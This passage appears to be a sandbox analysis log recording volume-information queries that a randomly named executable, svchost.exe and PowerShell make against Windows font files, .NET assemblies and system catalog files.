Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk | VolumeInformation
                      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log | VolumeInformation
                      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db | VolumeInformation
                      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm | VolumeInformation
                      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ | VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll | VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll | VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll | VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll | VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll | VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll | VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll | VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ | VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll | VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll | VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll | VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat | VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll | VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll | VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll | VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll | VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
